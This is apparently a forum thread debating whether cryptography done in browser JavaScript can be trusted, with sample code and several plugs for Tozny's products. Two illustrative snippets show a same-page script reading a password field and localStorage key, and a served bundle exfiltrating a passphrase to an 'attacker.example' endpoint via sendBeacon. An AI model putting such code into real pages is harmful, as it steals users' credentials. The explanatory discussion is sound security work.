As an alternative to this, check out TozID. The premise of their authentication model is to avoid sending the password altogether and instead use public-key crypto to sign and verify requests between the client and the auth server.
Note that such a system only benefits you if the client implementation can be trusted.
E.g., if your user agent does it all for you, you could consider it trusted; but if all the code is provided by the very "untrusted" service provider you don't want seeing your password, it ends up just being for show.
Similar situation with ProtonMail: As long as you use the clients shipped by them (webmail, app), all of the security hinges on nothing but a promise. Their app can read the passwords and keys as much as it wants.
I also found out that ProtonMail doesn't seem to send the password in plain text in the POST request itself. Really keen to see how they do it as well.
It is an SSO platform with authentication based on client side cryptography that enables end-to-end encryption for applications. It supports SAML clients like other SSO platforms.
Browser crypto has come a long way. With libraries like libsodium and proper implementation I think it’s drastically better than at the time of those articles (2013 and 2011).
Source: we also write encryption libraries and have a free implementation of our browser sdk at https://share.labs.tozny.com
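For illustration, here is a minimal sketch of the kind of thing libsodium's JS/WASM build makes straightforward in the browser. The libsodium-wrappers packaging and the surrounding function names are assumptions about how you'd wire it up; the 32-byte key comes from wherever your app derives it (e.g. crypto_secretbox_keygen()):

import sodium from 'libsodium-wrappers';   // WASM/asm.js build of libsodium

// Authenticated symmetric encryption of a string under a 32-byte secret key.
async function encryptNote(plaintext, key) {
  await sodium.ready;                                             // wait for the WASM module to load
  const nonce = sodium.randombytes_buf(sodium.crypto_secretbox_NONCEBYTES);
  const box = sodium.crypto_secretbox_easy(sodium.from_string(plaintext), nonce, key);
  return { nonce, box };                                          // both Uint8Array
}

async function decryptNote({ nonce, box }, key) {
  await sodium.ready;
  return sodium.to_string(sodium.crypto_secretbox_open_easy(box, nonce, key));
}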
No, it's not drastically better than it was in 2013.
People have done lots of things with browser cryptography, that's true. But none of what they've done addresses or mitigates the central flaw of browser javascript cryptography, which is that to use it, you have to continuously and durably trust the server. If you're doing that, you might as well just do the cryptography serverside.
The issue of having to trust the server also applies in a lot of non-browser cases. For example, I have to trust the 1Password update server, or forego 1Password updates.
It looks like the issues with browser-based cryptography from those two articles fall into three broad groups.
1. You have to trust the server.
2. The browsers don't do a good job of letting a site's JavaScript keep things secret from other things running in the browser.
3. If you implement cryptography in JavaScript, you are probably going to screw it up. There's a lot more to doing it right than just knowing to use AES and whatever the currently favored hash function is.
#1 is probably acceptable in a lot of cases, and #3 can probably be addressed by using the WebAssembly version of libsodium. That leaves #2 as the apparently insurmountable issue.
Suppose the user were willing to create a separate Firefox or Chrome profile just for using my web-based app, installed no browser plug-ins under that profile, set its home page to my app page, and never used that profile to visit any other sites. Would that be enough to address #2?
The issue of having to trust the server also applies in a lot of non-browser cases. For example, I have to trust the 1Password update server, or forego 1Password updates.
These are not quite the same kinds of trust - nearly every request to a compromised web app server is an opportunity to inject malicious code and malicious UI and compromise the clientside part of the app.
Compromising a software update server doesn't necessarily get you any of that - for instance, your 1Password client will presumably verify the authenticity of the update before it applies it.
I don't think the private methods proposal will help with cryptography at all. The "security" it provides boils down to making it difficult for code outside the class to access the value, which you can already do with a closure like this:
function makeCounter() {
  var x = 0;                            // private to the closure
  return function() { return ++x; };   // callers can increment but never read x directly
}
It doesn't help at all with side-channel attacks, which are the main reason it's hard to safely perform cryptographic operations in a just-in-time-compiled language like JavaScript. It also doesn't stop rogue scripts on the same page from pulling the user's passwords/keys right out of the password field, URL bar, localStorage, or wherever else your script gets them from.
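To make that concrete, here is roughly what any rogue script running on the same page can do; the selector and storage key name are hypothetical:

// Every script on the page shares the DOM and storage with your crypto code.
const stolenPassword = document.querySelector('input[type="password"]')?.value;
const stolenKey = localStorage.getItem('encryptionKey');   // hypothetical key name
console.log(stolenPassword, stolenKey);                    // or ship them anywhere it likes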
the central flaw of browser javascript cryptography, which is that to use it, you have to continuously and durably trust the server
What do you think of doing JavaScript Crypto in a browser extension? An extension runs code in the browser without persistent trust of a server (at least in the traditional webapp way; you have to persistently trust the extension update server, extension authors, chrome update server, etc). You could do things like quickly, interactively encrypt chunks of text with a symmetric key. Presumably you'd use an extension UI to enter your keys, to avoid keylogging.
I think it would be illuminating to have a small suite of well-implemented cryptographic primitives, curated by a well-known expert, installed and ready to use on any string in the browser.
(BTW why don't we see more random chunks of cyphertext everywhere? It would seem to me a good channel, to use a combination of public forums to transfer short bursts of cyphertext. Where are the encrypted Twitter broadcasts??)
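The closest existing thing to that curated suite is probably the browser's built-in SubtleCrypto API. A rough sketch of encrypting a string with it, with everything local to the example:

// AES-GCM encryption of a string using the built-in Web Crypto API.
async function encryptString(plaintext) {
  const key = await crypto.subtle.generateKey(
    { name: 'AES-GCM', length: 256 }, true, ['encrypt', 'decrypt']);
  const iv = crypto.getRandomValues(new Uint8Array(12));         // 96-bit nonce for GCM
  const ciphertext = await crypto.subtle.encrypt(
    { name: 'AES-GCM', iv }, key, new TextEncoder().encode(plaintext));
  return { key, iv, ciphertext };                                // ciphertext is an ArrayBuffer
}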
The issue with browser extensions is that you are not far from the usual hurdles of developing, releasing, and using a "real" desktop/mobile application. Having nothing to install and landing on a page that just works is a big plus for your users.
I wonder why browsers don't build their own browser API for file and mail crypto... that way you wouldn't have to trust the server, and you could verify that the server is using browser crypto.
There's no difference between trusting the server to deliver Javascript cryptography source code and trusting the server with your secrets. The server can just deliver code (in a number of different ways) to compromise those secrets.
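For example, a compromised (or coerced) server only has to serve a bundle where the encryption path quietly phones home first. The endpoint and helper names below are hypothetical:

async function encryptAndUpload(passphrase, plaintext) {
  // One extra, invisible line in the served JS defeats the client-side crypto:
  navigator.sendBeacon('https://attacker.example/collect', passphrase);
  const ciphertext = await realEncrypt(passphrase, plaintext);   // hypothetical helper
  return upload(ciphertext);                                     // hypothetical helper
}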
My understanding from the Apple/FBI fiasco is that it's an open question whether the US government is legally able to compel you to write and deliver custom code to your clients. But any local judge can issue you a warrant to hand over encrypted customer data that you're holding the key to.
But IANAL, maybe my take on that is overly simplistic.
Actually, Filekit is meant to be integrated into an application, and that application is responsible for delivering JS and handling identities, not the Tanker server.
Interestingly, the technology of Signed HTTP Exchanges could potentially be used as the basis for a system that removes the need to trust the server. The current Internet-Draft even includes a section on the Binary Transparency use case:
What's still missing, I think, is a way for a publisher to tell a browser "Only run new code from this domain after checking that the user is happy to upgrade". That would put the "web app" on roughly the same security footing as a desktop application with a built-in update system.
Wondering...browsers do seem to be able to do secure crypto in two existing scenarios: when presenting a client TLS certificate; and when performing authentication via WebAuthn in conjunction with U2F. Would it be possible to re-purpose either of those mechanisms to do other potentially useful secure crypto (e.g. sign blockchain transactions)?
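For reference, a rough sketch of what re-purposing WebAuthn for signing might look like, with the caveat that the authenticator signs a structure wrapping the challenge (authenticator data plus a client data hash), not the raw bytes alone, so verifiers would need to understand that format. credentialId is assumed to come from an earlier registration:

// Ask the authenticator to sign a challenge derived from the data you care about.
async function signWithAuthenticator(challengeBytes, credentialId) {
  const assertion = await navigator.credentials.get({
    publicKey: {
      challenge: challengeBytes,                                  // Uint8Array, e.g. a tx hash
      allowCredentials: [{ type: 'public-key', id: credentialId }],
      userVerification: 'preferred',
    },
  });
  // The private key never touches page JavaScript; the signature is made inside the authenticator.
  return assertion.response.signature;                            // ArrayBuffer
}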
I don't see how you have to trust the server unless it's also serving the client bundle. There are many decentralized use cases where you might "bring your own client" (or maybe one trusted server gives it to you) and use the client to interact with other untrusted servers.
You can have a trusted client and an untrusted server.
I agree w/ OP. Using cryptography for privacy and data control is a step in the right direction and needs some critical mass behind it for broader adoption.
Shameless plug: that is exactly what Tozny provides. An easy way to have end-to-end crypto with a sharing model that keeps data under the control of the original writer.
Helping developers avoid the pitfalls of cryptography is the main problem we at Tozny (http://tozny.com) are trying to solve.
We found that there is so much misinformation available online that it's too easy to shoot yourself in the foot with cryptography, so we're trying to make tools that make strong crypto easy to implement.
https://tozny.com/tozid/